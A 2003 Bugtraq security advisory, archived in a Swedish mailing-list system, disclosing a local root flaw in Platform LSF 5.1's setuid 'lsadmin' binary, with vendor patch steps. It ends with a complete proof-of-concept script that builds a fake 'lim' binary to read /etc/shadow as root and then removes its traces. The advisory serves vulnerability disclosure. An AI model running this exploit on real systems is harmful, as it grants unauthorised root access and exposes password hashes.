linux, säkerhet

102346 2003-05-22  19:30  /95 rader/ Tomasz Grabowski <cadence@apollo.aci.com.pl>
Importerad: 2003-05-22  19:30  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4975>
Kommentar till text 102190 av dong-h0un U <xploit@hackermail.com>
Ärende: Security advisory: LSF 5.1 local root exploit
------------------------------------------------------------

	             Security Advisory

	                22 May 2003

	           Local root in LSF 5.1


Name:            Load Sharing Facility version 5.1
Severity:        High
Vendor URL:      http://www.platform.com
Author:          Tomasz Grabowski (cadence@aci.com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix:      19 Mar 2003

Commercial:      I'm looking for a new job


Impact: An attacker can gain root priviledge by forcing the 'lsadmin'
	binary to execute code of attackers choice. The 'lsadmin' binary
	is setuid root.


Description:

The 'lsadmin' binary has a "ckconfig" command. It uses it to check
the correctness of config files. Right after it starts, it is using
the external 'lim' binary . It is using the LSF_SERVERDIR variable in
lsf.conf file to obtain a path for 'lim' binary. Regular user can
make his own lsf.conf file and, by using the LSF_ENVDIR variable,
force 'lsadmin' to use it instead of default /etc/lsf.conf
file. Attacker can therefore point the LSF_SERVERDIR variable to his
own 'lim' binary.  The attackers 'lim' binary will be executed with
setuid root priviledges.


How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com,
contact support@platform.com

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact
support@platform.com



Exploit:


# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file



---
Tomasz Grabowski  (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl
(102346) /Tomasz Grabowski <cadence@apollo.aci.com.pl>/(Ombruten)